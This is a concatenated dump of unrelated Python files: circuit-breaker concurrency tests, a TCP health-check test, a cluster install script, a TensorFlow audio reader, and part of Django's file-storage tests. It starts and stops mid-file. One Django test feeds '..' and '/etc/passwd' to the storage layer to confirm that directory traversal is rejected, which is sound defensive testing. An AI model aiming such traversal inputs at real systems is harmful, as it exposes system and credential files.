"""CircuitBreaker: it should compute a failed call atomically to
avoid race conditions.
"""
# Create a specific exception to avoid masking other errors
class SpecificException(Exception):
pass
@self.breaker
def err(): raise SpecificException()
def trigger_error():
for n in range(500):
try: err()
except SpecificException: pass
def _inc_counter(self):
c = self._state_storage._fail_counter
sleep(0.00005)
self._state_storage._fail_counter = c + 1
self._mock_function(self.breaker, _inc_counter)
self._start_threads(trigger_error, 3)
self.assertEqual(1500, self.breaker.fail_counter)
def test_success_thread_safety(self):
"""CircuitBreaker: it should compute a successful call atomically
to avoid race conditions.
"""
@self.breaker
def suc(): return True
def trigger_success():
for n in range(500):
suc()
class SuccessListener(CircuitBreakerListener):
def success(self, cb):
c = 0
if hasattr(cb, '_success_counter'):
c = cb._success_counter
sleep(0.00005)
cb._success_counter = c + 1
self.breaker.add_listener(SuccessListener())
self._start_threads(trigger_success, 3)
self.assertEqual(1500, self.breaker._success_counter)
def test_half_open_thread_safety(self):
"""CircuitBreaker: it should allow only one trial call when the
circuit is half-open.
"""
self.breaker = CircuitBreaker(fail_max=1, reset_timeout=0.01)
self.breaker.open()
sleep(0.01)
@self.breaker
def err(): raise Exception()
def trigger_failure():
try: err()
except: pass
class StateListener(CircuitBreakerListener):
def __init__(self):
self._count = 0
def before_call(self, cb, fun, *args, **kwargs):
sleep(0.00005)
def state_change(self, cb, old_state, new_state):
if new_state.name == 'half-open':
self._count += 1
state_listener = StateListener()
self.breaker.add_listener(state_listener)
self._start_threads(trigger_failure, 5)
self.assertEqual(1, state_listener._count)
def test_fail_max_thread_safety(self):
"""CircuitBreaker: it should not allow more failed calls than
'fail_max' setting.
"""
@self.breaker
def err(): raise Exception()
def trigger_error():
for i in range(2000):
try: err()
except: pass
class SleepListener(CircuitBreakerListener):
def before_call(self, cb, func, *args, **kwargs):
sleep(0.00005)
self.breaker.add_listener(SleepListener())
self._start_threads(trigger_error, 3)
self.assertEqual(self.breaker.fail_max, self.breaker.fail_counter)
class CircuitBreakerRedisConcurrencyTestCase(unittest.TestCase):
"""
Tests to reproduce common concurrency between different machines
connecting to redis. This is simulated locally using threads.
"""
def setUp(self):
self.redis = fakeredis.FakeStrictRedis()
self.breaker_kwargs = {'fail_max': 3000, 'reset_timeout': 1,'state_storage': CircuitRedisStorage('closed', self.redis)}
self.breaker = CircuitBreaker(**self.breaker_kwargs)
def tearDown(self):
self.redis.flushall()
def _start_threads(self, target, n):
"""
Starts `n` threads that calls `target` and waits for them to finish.
"""
threads = [threading.Thread(target=target) for i in range(n)]
[t.start() for t in threads]
[t.join() for t in threads]
def _mock_function(self, obj, func):
"""
Replaces a bounded function in `self.breaker` by another.
"""
setattr(obj, func.__name__, MethodType(func, self.breaker))
def test_fail_thread_safety(self):
"""CircuitBreaker: it should compute a failed call atomically to
avoid race conditions.
"""
# Create a specific exception to avoid masking other errors
class SpecificException(Exception):
pass
@self.breaker
def err(): raise SpecificException()
def trigger_error():
for n in range(500):
try: err()
except SpecificException: pass
def _inc_counter(self):
sleep(0.00005)
self._state_storage.increment_counter()
self._mock_function(self.breaker, _inc_counter)
self._start_threads(trigger_error, 3)
self.assertEqual(1500, self.breaker.fail_counter)
def test_success_thread_safety(self):
"""CircuitBreaker: it should compute a successful call atomically
to avoid race conditions.
"""
@self.breaker
def suc(): return True
def trigger_success():
for n in range(500):
suc()
class SuccessListener(CircuitBreakerListener):
def success(self, cb):
c = 0
if hasattr(cb, '_success_counter'):
c = cb._success_counter
sleep(0.00005)
cb._success_counter = c + 1
self.breaker.add_listener(SuccessListener())
self._start_threads(trigger_success, 3)
self.assertEqual(1500, self.breaker._success_counter)
def test_half_open_thread_safety(self):
"""CircuitBreaker: it should allow only one trial call when the
circuit is half-open.
"""
self.breaker = CircuitBreaker(fail_max=1, reset_timeout=0.01)
self.breaker.open()
sleep(0.01)
@self.breaker
def err(): raise Exception()
def trigger_failure():
try: err()
except: pass
class StateListener(CircuitBreakerListener):
def __init__(self):
self._count = 0
def before_call(self, cb, fun, *args, **kwargs):
sleep(0.00005)
def state_change(self, cb, old_state, new_state):
if new_state.name == 'half-open':
self._count += 1
state_listener = StateListener()
self.breaker.add_listener(state_listener)
self._start_threads(trigger_failure, 5)
self.assertEqual(1, state_listener._count)
def test_fail_max_thread_safety(self):
"""CircuitBreaker: it should not allow more failed calls than 'fail_max'
setting. Note that with Redis, where we have separate systems
incrementing the counter, we can get concurrent updates such that the
counter is greater than the 'fail_max' by the number of systems. To
prevent this, we'd need to take out a lock amongst all systems before
trying the call.
"""
@self.breaker
def err(): raise Exception()
def trigger_error():
for i in range(2000):
try: err()
except: pass
class SleepListener(CircuitBreakerListener):
def before_call(self, cb, func, *args, **kwargs):
sleep(0.00005)
self.breaker.add_listener(SleepListener())
num_threads = 3
self._start_threads(trigger_error, num_threads)
self.assertTrue(self.breaker.fail_counter < self.breaker.fail_max + num_threads)
if __name__ == "__main__":
unittest.main()
|
tcp_test.py
|
from __future__ import absolute_import, print_function
import failover
import logging
from select import select
from six.moves.http_client import (
HTTPConnection, INTERNAL_SERVER_ERROR, NOT_FOUND, OK, SERVICE_UNAVAILABLE)
from socket import (
AF_INET, create_connection, INADDR_ANY, SOCK_STREAM, socket, SOL_SOCKET,
SO_REUSEADDR)
from sys import stderr
from threading import Thread, Condition
from time import sleep
from unittest import TestCase, main
from .server import create_server, start_server, stop_server
LOOPBACK = "127.0.0.1"
UNROUTABLE = "192.0.2.1" # RFC 5737 -- TEST-NET-1 space, unroutable globally
log = logging.getLogger("test.tcp")
class TCPService(Thread):
def __init__(self, *args, **kw):
super(TCPService, self).__init__(*args, **kw)
self.lock = Condition()
self.socket = socket(AF_INET, SOCK_STREAM)
self.socket.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
self.socket.bind((LOOPBACK, 0))
self.socket.listen(5)
self.port = self.socket.getsockname()[1]
self.timeout = 0.1
self.exit_requested = False
log.info("Created server on port %d", self.port)
return
def close(self):
log.info("Closing server on port %d", self.port)
with self.lock:
if self.socket is not None:
self.socket.close()
self.socket = None
self.lock.notify()
return
def listen(self):
log.info("Activating server on port %d", self.port)
with self.lock:
if self.socket is None:
self.socket = socket(AF_INET, SOCK_STREAM)
self.socket.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
self.socket.bind((LOOPBACK, self.port))
self.socket.listen(5)
self.lock.notify()
return
def run(self):
import time
my_sleep = time.sleep
self.lock.acquire()
try:
while not self.exit_requested:
log.debug("Allowing other thread to signal us")
try:
self.lock.wait(0.1)
except RuntimeError:
pass
if self.socket:
log.debug("Waiting for connection")
result = select([self.socket], [], [], self.timeout)
if result[0]:
log.debug("Healthy -- received connection")
conn, client = self.socket.accept()
log.debug("discarding data from %s:%d", client[0], client[1])
self.discard(conn)
else:
log.debug("Healthy -- no connection")
else:
self.lock.release()
try:
log.debug("Unhealthy -- ignoring connection")
my_sleep(self.timeout)
finally:
self.lock.acquire()
except Exception as e:
log.error("YIKES", exc_info=True)
finally:
self.lock.release()
log.debug("Exiting")
return
def discard(self, connection):
"""
Read and discard all received data on a connection.
"""
def do_discard():
while True:
data = connection.recv(1024)
if len(data) == 0:
connection.close()
break
thread = Thread(target=do_discard)
thread.start()
return
class CheckTCPServiceTest(TestCase):
def start_service(self):
service = TCPService()
service.start()
return service
def setUp(self):
logging.basicConfig(
stream=stderr, level=logging.DEBUG,
format=("%(asctime)s %(module)s [%(levelname)s] "
"%(filename)s:%(lineno)d: %(message)s"))
def test_basic_connection(self):
service = self.start_service()
checker = failover.TCPCheck(
LOOPBACK, service.port, failover.second(10), name="tcp1")
self.assertTrue(checker())
service.close()
self.assertFalse(checker())
service.listen()
self.assertTrue(checker())
self.assertTrue(checker())
# Check repr
self.assertEqual(repr(checker), "tcp1")
checker.name = None
self.assertTrue(repr(checker).startswith(
"TCPCheck(host='127.0.0.1', port=%d, timeout=" % service.port))
service.exit_requested = True
service.join()
return
def test_unroutable(self):
checker = failover.TCPCheck(
UNROUTABLE, 80, failover.second(0.1))
self.assertFalse(checker())
return
def test_server(self):
service = self.start_service()
server = create_server()
# Make sure we reject invalid component names
try:
server.add_component('/foo', None)
self.fail("Expected ValueError")
except ValueError:
pass
server.add_component(
'always-succeed',
failover.TCPCheck(LOOPBACK, service.port,
failover.second(10)))
# Add another with an integer time value
server.add_component(
'always-succeed2',
failover.TCPCheck(LOOPBACK, service.port, 10))
checker = failover.TCPCheck(
UNROUTABLE, 80, failover.second(0.1))
server.add_component('always-fail', checker)
# Make sure checker got a name
self.assertEqual(repr(checker), "always-fail")
# Add a service-name check
checker = failover.TCPCheck(
UNROUTABLE, "http", failover.second(0.1))
server.add_component('always-fail2', checker)
# Try adding an un-callable object
server.add_component('wrong', 4)
# Run the HTTP server in a separate thread
start_server(server)
try:
# always-succeed should always return ok
con = HTTPConnection(LOOPBACK, server.port)
con.request("GET", "/always-succeed")
response = con.getresponse()
self.assertEqual(response.status, OK)
con.request("GET", "/always-succeed2")
response = con.getresponse()
self.assertEqual(response.status, OK)
# always-fail should always return service unavailable
con.request("GET", "/always-fail")
response = con.getresponse()
self.assertEqual(response.status, SERVICE_UNAVAILABLE)
# HEAD requests should return the same.
con.request("HEAD", "/always-fail")
response = con.getresponse()
self.assertEqual(response.status, SERVICE_UNAVAILABLE)
# A non-existent service should return not found
con.request("GET", "/unknown")
response = con.getresponse()
self.assertEqual(response.status, NOT_FOUND)
# Uncallable service should return 500
con.request("GET", "/wrong")
response = con.getresponse()
self.assertEqual(response.status, INTERNAL_SERVER_ERROR)
finally:
log.info("Exiting TCP server")
service.exit_requested = True
service.join()
log.info("Exiting health check server")
stop_server(server)
return
def test_reject_invalid_hostname(self):
try:
failover.TCPCheck(3.14159, 90, failover.second(1))
self.fail("Expected TypeError")
except TypeError:
pass
def test_reject_invalid_port(self):
for port in [-2, -1, 0, 65536, 131072, "myxlflyx"]:
try:
failover.TCPCheck(LOOPBACK, port, failover.second(1))
self.fail("Expected ValueError")
except ValueError:
pass
try:
failover.TCPCheck(LOOPBACK, None, failover.second(1))
self.fail("Expected TypeError")
except TypeError:
pass
def test_reject_invalid_duration(self):
try:
failover.TCPCheck(LOOPBACK, 80, failover.second(-1))
self.fail("Expected ValueError")
except ValueError:
pass
try:
failover.TCPCheck(LOOPBACK, 80, -1)
self.fail("Expected ValueError")
except ValueError:
pass
try:
failover.TCPCheck(LOOPBACK, 80, -1.5)
self.fail("Expected ValueError")
except ValueError:
pass
try:
failover.TCPCheck(LOOPBACK, 80, failover.count(1))
self.fail("Expected ValueError")
except ValueError:
pass
try:
failover.TCPCheck(LOOPBACK, 80, [1,2,3])
self.fail("Expected TypeError")
except TypeError:
pass
if __name__ == "__main__":
main()
|
new_install.py
|
#!/usr/bin/env python
import sys
sys.path = [".", "lib"] + sys.path
import threading
import queue
import time
import random
import install_utils, install_constants
import logging.config
import os
from membase.api.exception import InstallException
import traceback
logging.config.fileConfig("scripts.logging.conf")
log = logging.getLogger()
q = queue.Queue()
def node_installer(node, install_tasks):
while True:
install_task = install_tasks.get()
if install_task is None:
break
else:
do_install_task(install_task, node)
install_tasks.task_done()
def on_install_error(install_task, node, e):
node.queue.empty()
log.error("Error {0}:{1} occurred on {2} during {3}".format(repr(e), e, node.ip, install_task))
def do_install_task(task, node):
try:
if task == "uninstall":
node.uninstall_cb()
elif task == "install":
node.install_cb()
elif task == "init":
node.init_cb()
elif task == "cleanup":
node.cleanup_cb()
log.info("Done with %s on %s." % (task, node.ip))
except Exception as e:
on_install_error(task, node, e)
traceback.print_exc()
def validate_install(params):
log.info("-" * 100)
cluster_nodes = {}
for node in install_utils.NodeHelpers:
version = params["version"]
if node.install_success is None:
node.install_success = False
if params["cluster_version"]:
if node.ip != params["bkrs_client"].ip:
version = params["cluster_version"]
if node.rest:
try:
node_status = node.rest.cluster_status()["nodes"]
except:
continue
for item in node_status:
hostname = item["hostname"]
if "alternateAddresses" in item and "external" in item["alternateAddresses"]:
hostname = item["alternateAddresses"]["external"]["hostname"]
if node.ip not in hostname:
continue
if version in item['version'] and item['status'] == "healthy":
node.install_success = True
if node.enable_ipv6 and not item["addressFamily"] == "inet6":
node.install_success = False
afamily = "Unknown"
if 'addressFamily' in list(item.keys()):
afamily = item['addressFamily']
cluster_nodes[node.ip] = {
"hostname": item["hostname"],
"version": item["version"],
"afamily": afamily,
"services": item["services"]
}
# check cluster has correct number of nodes
if params.get("init_clusters", False):
selected_cluster = None
for cluster in params["clusters"].values():
for server in cluster:
if server.ip == node.ip:
selected_cluster = cluster
if selected_cluster is not None:
if len(node_status) != len(selected_cluster):
node.install_success = False
clusters = []
if params.get("init_clusters", False):
for cluster in params["clusters"].values():
nodes = { node.ip: cluster_nodes[node.ip] for node in cluster}
for [ip, node] in nodes.items():
del cluster_nodes[ip]
clusters.append(list(nodes.values()))
for node in cluster_nodes.values():
clusters.append([node])
for [i, cluster] in enumerate(clusters):
for node in cluster:
log.info("cluster:C{0}\tnode:{1}\tversion:{2}\taFamily:{3}\tservices:{4}".format(i + 1, node['hostname'],
node['version'],
node['afamily'],
node['services']))
install_utils.print_result_and_exit()
def do_install(params):
# Per node, spawn one thread, which will process a queue of install tasks
for server in params["servers"]:
node_helper = install_utils.get_node_helper(server.ip)
install_tasks = params["install_tasks"]
q = queue.Queue()
for _ in install_tasks:
q.put(_)
t = threading.Thread(target=node_installer, args=(node_helper, q))
t.daemon = True
t.start()
node_helper.queue = q
node_helper.thread = t
force_stop = start_time + params["timeout"]
for node in install_utils.NodeHelpers:
try:
while node.queue.unfinished_tasks and time.time() < force_stop:
time.sleep(install_constants.INSTALL_POLL_INTERVAL)
else:
raise InstallException
except InstallException:
if time.time() >= force_stop:
log.error("INSTALL TIMED OUT AFTER {0}s.VALIDATING..".format(params["timeout"]))
break
if "init" in params["install_tasks"]:
if params.get("init_clusters", False) and len(params["clusters"]) > 0:
timeout = force_stop - time.time()
install_utils.init_clusters(timeout)
validate_install(params)
def do_uninstall(params):
# Per node, spawn one thread, which will process a queue of
# uninstall tasks
for server in params["servers"]:
node_helper = install_utils.get_node_helper(server.ip)
install_tasks = ['uninstall']
q = queue.Queue()
for _ in install_tasks:
q.put(_)
t = threading.Thread(target=node_installer,
args=(node_helper, q))
t.daemon = True
t.start()
node_helper.queue = q
node_helper.thread = t
force_stop = start_time + params["timeout"]
for node in install_utils.NodeHelpers:
try:
while node.queue.unfinished_tasks and time.time() < \
force_stop:
time.sleep(install_constants.INSTALL_POLL_INTERVAL)
else:
raise InstallException
except InstallException:
if time.time() >= force_stop:
log.error(
"Uninstall TIMED OUT AFTER {0}s. "
"VALIDATING..".format(
params["timeout"]))
break
def main():
params = install_utils.process_user_input()
install_utils.pre_install_steps()
if 'uninstall' in params['install_tasks']:
# Do uninstallation of products first before downloading the
# builds.
do_uninstall(params)
params['install_tasks'].remove('uninstall')
install_utils.download_build()
do_install(params)
if __name__ == "__main__":
start_time = time.time()
main()
end_time = time.time()
log.info("TOTAL INSTALL TIME = {0} seconds".format(round(end_time - start_time)))
sys.exit(0)
|
audio_reader.py
|
import fnmatch
import os
import random
import re
import threading
import librosa
import numpy as np
import tensorflow as tf
FILE_PATTERN = r'p([0-9]+)_([0-9]+)\.wav'
def get_category_cardinality(files):
id_reg_expression = re.compile(FILE_PATTERN)
min_id = None
max_id = None
for filename in files:
matches = id_reg_expression.findall(filename)[0]
id, recording_id = [int(id_) for id_ in matches]
if min_id is None or id < min_id:
min_id = id
if max_id is None or id > max_id:
max_id = id
return min_id, max_id
def randomize_files(files):
for file in files:
file_index = random.randint(0, (len(files) - 1))
yield files[file_index]
def find_files(directory, pattern='*.mp3'):
'''Recursively finds all files matching the pattern.'''
files = []
for root, dirnames, filenames in os.walk(directory):
for filename in fnmatch.filter(filenames, pattern):
files.append(os.path.join(root, filename))
return files
def load_generic_audio(directory, sample_rate):
'''Generator that yields audio waveforms from the directory.'''
files = find_files(directory)
id_reg_exp = re.compile(FILE_PATTERN)
print("files length: {}".format(len(files)))
randomized_files = randomize_files(files)
for filename in randomized_files:
ids = id_reg_exp.findall(filename)
if not ids:
# The file name does not match the pattern containing ids, so
# there is no id.
category_id = None
else:
# The file name matches the pattern for containing ids.
category_id = int(ids[0][0])
audio, _ = librosa.load(filename, sr=sample_rate, mono=True)
audio = audio.reshape(-1, 1)
yield audio, filename, category_id
def trim_silence(audio, threshold, frame_length=2048):
'''Removes silence at the beginning and end of a sample.'''
if audio.size < frame_length:
frame_length = audio.size
# change from rmse to rms
energy = librosa.feature.rms(audio, frame_length=frame_length)
frames = np.nonzero(energy > threshold)
indices = librosa.core.frames_to_samples(frames)[1]
# Note: indices can be an empty array, if the whole audio was silence.
return audio[indices[0]:indices[-1]] if indices.size else audio[0:0]
def not_all_have_id(files):
''' Return true iff any of the filenames does not conform to the pattern
we require for determining the category id.'''
id_reg_exp = re.compile(FILE_PATTERN)
for file in files:
ids = id_reg_exp.findall(file)
if not ids:
return True
return False
class AudioReader(object):
'''Generic background audio reader that preprocesses audio files
and enqueues them into a TensorFlow queue.'''
def __init__(self,
audio_dir,
coord,
sample_rate,
gc_enabled,
receptive_field,
sample_size=None,
silence_threshold=None,
queue_size=32):
self.audio_dir = audio_dir
self.sample_rate = sample_rate
self.coord = coord
self.sample_size = sample_size
self.receptive_field = receptive_field
self.silence_threshold = silence_threshold
self.gc_enabled = gc_enabled
self.threads = []
self.sample_placeholder = tf.compat.v1.placeholder(dtype=tf.float32, shape=None)
self.queue = tf.queue.PaddingFIFOQueue(queue_size,
['float32'],
shapes=[(None, 1)])
self.enqueue = self.queue.enqueue([self.sample_placeholder])
if self.gc_enabled:
self.id_placeholder = tf.compat.v1.placeholder(dtype=tf.int32, shape=())
self.gc_queue = tf.PaddingFIFOQueue(queue_size, ['int32'],
shapes=[()])
self.gc_enqueue = self.gc_queue.enqueue([self.id_placeholder])
# TODO Find a better way to check this.
# Checking inside the AudioReader's thread makes it hard to terminate
# the execution of the script, so we do it in the constructor for now.
files = find_files(audio_dir)
if not files:
raise ValueError("No audio files found in '{}'.".format(audio_dir))
if self.gc_enabled and not_all_have_id(files):
raise ValueError("Global conditioning is enabled, but file names "
"do not conform to pattern having id.")
# Determine the number of mutually-exclusive categories we will
# accomodate in our embedding table.
if self.gc_enabled:
_, self.gc_category_cardinality = get_category_cardinality(files)
# Add one to the largest index to get the number of categories,
# since tf.nn.embedding_lookup expects zero-indexing. This
# means one or more at the bottom correspond to unused entries
# in the embedding lookup table. But that's a small waste of memory
# to keep the code simpler, and preserves correspondance between
# the id one specifies when generating, and the ids in the
# file names.
self.gc_category_cardinality += 1
print("Detected --gc_cardinality={}".format(
self.gc_category_cardinality))
else:
self.gc_category_cardinality = None
def dequeue(self, num_elements):
output = self.queue.dequeue_many(num_elements)
return output
def dequeue_gc(self, num_elements):
return self.gc_queue.dequeue_many(num_elements)
def thread_main(self, sess):
stop = False
# Go through the dataset multiple times
while not stop:
iterator = load_generic_audio(self.audio_dir, self.sample_rate)
for audio, filename, category_id in iterator:
if self.coord.should_stop():
stop = True
break
if self.silence_threshold is not None:
# Remove silence
audio = trim_silence(audio[:, 0], self.silence_threshold)
audio = audio.reshape(-1, 1)
if audio.size == 0:
print("Warning: {} was ignored as it contains only "
"silence. Consider decreasing trim_silence "
"threshold, or adjust volume of the audio."
.format(filename))
audio = np.pad(audio, [[self.receptive_field, 0], [0, 0]],
'constant')
if self.sample_size:
# Cut samples into pieces of size receptive_field +
# sample_size with receptive_field overlap
while len(audio) > self.receptive_field:
piece = audio[:(self.receptive_field +
self.sample_size), :]
sess.run(self.enqueue,
feed_dict={self.sample_placeholder: piece})
audio = audio[self.sample_size:, :]
if self.gc_enabled:
sess.run(self.gc_enqueue, feed_dict={
self.id_placeholder: category_id})
else:
sess.run(self.enqueue,
feed_dict={self.sample_placeholder: audio})
if self.gc_enabled:
sess.run(self.gc_enqueue,
feed_dict={self.id_placeholder: category_id})
def start_threads(self, sess, n_threads=1):
for _ in range(n_threads):
thread = threading.Thread(target=self.thread_main, args=(sess,))
thread.daemon = True # Thread will close when parent quits.
thread.start()
self.threads.append(thread)
return self.threads
|
tests.py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import errno
import os
import shutil
import sys
import tempfile
import threading
import time
import unittest
import warnings
from datetime import datetime, timedelta
from django.core.cache import cache
from django.core.exceptions import SuspiciousFileOperation, SuspiciousOperation
from django.core.files.base import ContentFile, File
from django.core.files.storage import FileSystemStorage, get_storage_class
from django.core.files.uploadedfile import (
InMemoryUploadedFile, SimpleUploadedFile, TemporaryUploadedFile,
)
from django.test import (
LiveServerTestCase, SimpleTestCase, TestCase, override_settings,
)
from django.utils import six
from django.utils._os import upath
from django.utils.six.moves.urllib.request import urlopen
from .models import Storage, temp_storage, temp_storage_location
FILE_SUFFIX_REGEX = '[A-Za-z0-9]{7}'
class GetStorageClassTests(SimpleTestCase):
def test_get_filesystem_storage(self):
"""
get_storage_class returns the class for a storage backend name/path.
"""
self.assertEqual(
get_storage_class('django.core.files.storage.FileSystemStorage'),
FileSystemStorage)
def test_get_invalid_storage_module(self):
"""
get_storage_class raises an error if the requested import don't exist.
"""
with six.assertRaisesRegex(self, ImportError, "No module named '?storage'?"):
get_storage_class('storage.NonExistingStorage')
def test_get_nonexisting_storage_class(self):
"""
get_storage_class raises an error if the requested class don't exist.
"""
self.assertRaises(ImportError, get_storage_class,
'django.core.files.storage.NonExistingStorage')
def test_get_nonexisting_storage_module(self):
"""
get_storage_class raises an error if the requested module don't exist.
"""
# Error message may or may not be the fully qualified path.
with six.assertRaisesRegex(self, ImportError,
"No module named '?(django.core.files.)?non_existing_storage'?"):
get_storage_class(
'django.core.files.non_existing_storage.NonExistingStorage')
class FileStorageDeconstructionTests(unittest.TestCase):
def test_deconstruction(self):
path, args, kwargs = temp_storage.deconstruct()
self.assertEqual(path, "django.core.files.storage.FileSystemStorage")
self.assertEqual(args, tuple())
self.assertEqual(kwargs, {'location': temp_storage_location})
kwargs_orig = {
'location': temp_storage_location,
'base_url': 'http://myfiles.example.com/'
}
storage = FileSystemStorage(**kwargs_orig)
path, args, kwargs = storage.deconstruct()
self.assertEqual(kwargs, kwargs_orig)
class FileStorageTests(unittest.TestCase):
storage_class = FileSystemStorage
def setUp(self):
self.temp_dir = tempfile.mkdtemp()
self.storage = self.storage_class(location=self.temp_dir,
base_url='/test_media_url/')
# Set up a second temporary directory which is ensured to have a mixed
# case name.
self.temp_dir2 = tempfile.mkdtemp(suffix='aBc')
def tearDown(self):
shutil.rmtree(self.temp_dir)
shutil.rmtree(self.temp_dir2)
def test_empty_location(self):
"""
Makes sure an exception is raised if the location is empty
"""
storage = self.storage_class(location='')
self.assertEqual(storage.base_location, '')
self.assertEqual(storage.location, upath(os.getcwd()))
def test_file_access_options(self):
"""
Standard file access options are available, and work as expected.
"""
self.assertFalse(self.storage.exists('storage_test'))
f = self.storage.open('storage_test', 'w')
f.write('storage contents')
f.close()
self.assertTrue(self.storage.exists('storage_test'))
f = self.storage.open('storage_test', 'r')
self.assertEqual(f.read(), 'storage contents')
f.close()
self.storage.delete('storage_test')
self.assertFalse(self.storage.exists('storage_test'))
def test_file_accessed_time(self):
"""
File storage returns a Datetime object for the last accessed time of
a file.
"""
self.assertFalse(self.storage.exists('test.file'))
f = ContentFile('custom contents')
f_name = self.storage.save('test.file', f)
atime = self.storage.accessed_time(f_name)
self.assertEqual(atime, datetime.fromtimestamp(
os.path.getatime(self.storage.path(f_name))))
self.assertLess(datetime.now() - self.storage.accessed_time(f_name), timedelta(seconds=2))
self.storage.delete(f_name)
def test_file_created_time(self):
"""
File storage returns a Datetime object for the creation time of
a file.
"""
self.assertFalse(self.storage.exists('test.file'))
f = ContentFile('custom contents')
f_name = self.storage.save('test.file', f)
ctime = self.storage.created_time(f_name)
self.assertEqual(ctime, datetime.fromtimestamp(
os.path.getctime(self.storage.path(f_name))))
self.assertLess(datetime.now() - self.storage.created_time(f_name), timedelta(seconds=2))
self.storage.delete(f_name)
def test_file_modified_time(self):
"""
File storage returns a Datetime object for the last modified time of
a file.
"""
self.assertFalse(self.storage.exists('test.file'))
f = ContentFile('custom contents')
f_name = self.storage.save('test.file', f)
mtime = self.storage.modified_time(f_name)
self.assertEqual(mtime, datetime.fromtimestamp(
os.path.getmtime(self.storage.path(f_name))))
self.assertLess(datetime.now() - self.storage.modified_time(f_name), timedelta(seconds=2))
self.storage.delete(f_name)
def test_file_save_without_name(self):
"""
File storage extracts the filename from the content object if no
name is given explicitly.
"""
self.assertFalse(self.storage.exists('test.file'))
f = ContentFile('custom contents')
f.name = 'test.file'
storage_f_name = self.storage.save(None, f)
self.assertEqual(storage_f_name, f.name)
self.assertTrue(os.path.exists(os.path.join(self.temp_dir, f.name)))
self.storage.delete(storage_f_name)
def test_file_save_with_path(self):
"""
Saving a pathname should create intermediate directories as necessary.
"""
self.assertFalse(self.storage.exists('path/to'))
self.storage.save('path/to/test.file',
ContentFile('file saved with path'))
self.assertTrue(self.storage.exists('path/to'))
with self.storage.open('path/to/test.file') as f:
self.assertEqual(f.read(), b'file saved with path')
self.assertTrue(os.path.exists(
os.path.join(self.temp_dir, 'path', 'to', 'test.file')))
self.storage.delete('path/to/test.file')
def test_save_doesnt_close(self):
with TemporaryUploadedFile('test', 'text/plain', 1, 'utf8') as file:
file.write(b'1')
file.seek(0)
self.assertFalse(file.closed)
self.storage.save('path/to/test.file', file)
self.assertFalse(file.closed)
self.assertFalse(file.file.closed)
file = InMemoryUploadedFile(six.StringIO('1'), '', 'test',
'text/plain', 1, 'utf8')
with file:
self.assertFalse(file.closed)
self.storage.save('path/to/test.file', file)
self.assertFalse(file.closed)
self.assertFalse(file.file.closed)
def test_file_path(self):
"""
File storage returns the full path of a file
"""
self.assertFalse(self.storage.exists('test.file'))
f = ContentFile('custom contents')
f_name = self.storage.save('test.file', f)
self.assertEqual(self.storage.path(f_name),
os.path.join(self.temp_dir, f_name))
self.storage.delete(f_name)
def test_file_url(self):
"""
File storage returns a url to access a given file from the Web.
"""
self.assertEqual(self.storage.url('test.file'),
'%s%s' % (self.storage.base_url, 'test.file'))
# should encode special chars except ~!*()'
# like encodeURIComponent() JavaScript function do
self.assertEqual(self.storage.url(r"""~!*()'@#$%^&*abc`+ =.file"""),
"""/test_media_url/~!*()'%40%23%24%25%5E%26*abc%60%2B%20%3D.file""")
# should translate os path separator(s) to the url path separator
self.assertEqual(self.storage.url("""a/b\\c.file"""),
"""/test_media_url/a/b/c.file""")
self.storage.base_url = None
self.assertRaises(ValueError, self.storage.url, 'test.file')
# #22717: missing ending slash in base_url should be auto-corrected
storage = self.storage_class(location=self.temp_dir,
base_url='/no_ending_slash')
self.assertEqual(
storage.url('test.file'),
'%s%s' % (storage.base_url, 'test.file')
)
def test_listdir(self):
"""
File storage returns a tuple containing directories and files.
"""
self.assertFalse(self.storage.exists('storage_test_1'))
self.assertFalse(self.storage.exists('storage_test_2'))
self.assertFalse(self.storage.exists('storage_dir_1'))
self.storage.save('storage_test_1', ContentFile('custom content'))
self.storage.save('storage_test_2', ContentFile('custom content'))
os.mkdir(os.path.join(self.temp_dir, 'storage_dir_1'))
dirs, files = self.storage.listdir('')
self.assertEqual(set(dirs), {'storage_dir_1'})
self.assertEqual(set(files),
{'storage_test_1', 'storage_test_2'})
self.storage.delete('storage_test_1')
self.storage.delete('storage_test_2')
os.rmdir(os.path.join(self.temp_dir, 'storage_dir_1'))
def test_file_storage_prevents_directory_traversal(self):
"""
File storage prevents directory traversal (files can only be accessed if
they're below the storage location).
"""
self.assertRaises(SuspiciousOperation, self.storage.exists, '..')
self.assertRaises(SuspiciousOperation, self.storage.exists, '/etc/passwd')
def test_file_storage_preserves_filename_case(self):
"""The storage backend should preserve case of filenames."""
# Create a storage backend associated with the mixed case name
# directory.
other_temp_storage = self.storage_class(location=self.temp_dir2)
# Ask that storage backend to store a file with a mixed case filename.
mixed_case = 'CaSe_SeNsItIvE'
file = other_temp_storage.open(mixed_case, 'w')
file.write('storage contents')
file.close()
self.assertEqual(os.path.join(self.temp_dir2, mixed_case),
other_temp_storage.path(mixed_case))
other_temp_storage.delete(mixed_case)
def test_makedirs_race_handling(self):
"""
File storage should be robust against directory creation race conditions.
"""
real_makedirs = os.makedirs
# Monkey-patch os.makedirs, to simulate a normal call, a raced call,
# and an error.
def fake_makedirs(path):
if path == os.path.join(self.temp_dir, 'normal'):
real_makedirs(path)
elif path == os.path.join(self.temp_dir, 'raced'):
real_makedirs(path)
raise OSError(errno.EEXIST, 'simulated EEXIST')
elif path == os.path.join(self.temp_dir, 'error'):
raise OSError(errno.EACCES, 'simulated EACCES')
else:
self.fail('unexpected argument %r' % path)
try:
os.makedirs = fake_makedirs
self.storage.save('normal/test.file',
ContentFile('saved normally'))
with self.storage.open('normal/test.file') as f:
self.assertEqual(f.read(), b'saved normally')
self.storage.save('raced/test.file',
ContentFile('saved with race'))
with self.storage.open('raced/test.file') as f:
self.assertEqual(f.read(), b'saved with race')
# Check that OSErrors aside from EEXIST are still raised.
self.assertRaises(OSError,
self.storage.save, 'error/test.file', ContentFile('not saved'))
finally:
os.makedirs = real_makedirs
def test_remove_race_handling(self):
"""
File storage should be robust against file removal race conditions.
"""
real_remove = os.remove
# Monkey-patch os.remove, to simulate a normal call, a raced call,
# and an error.
def fake_remove(path):
if path == os.path.join(self.temp_dir, 'normal.file'):
real_remove(path)
elif path == os.path.join(self.temp_dir, 'raced.file'):
real_remove(path)
raise OSError(errno.ENOENT, 'simulated ENOENT')
elif path == os.path.join(self.temp_dir, 'error.file'):
raise OSError(errno.EACCES, 'simulated EACCES')
else:
self.fail('unexpected argument %r' % path)
try:
os.remove = fake_remove
self.storage.save('normal.file', ContentFile('delete normally'))
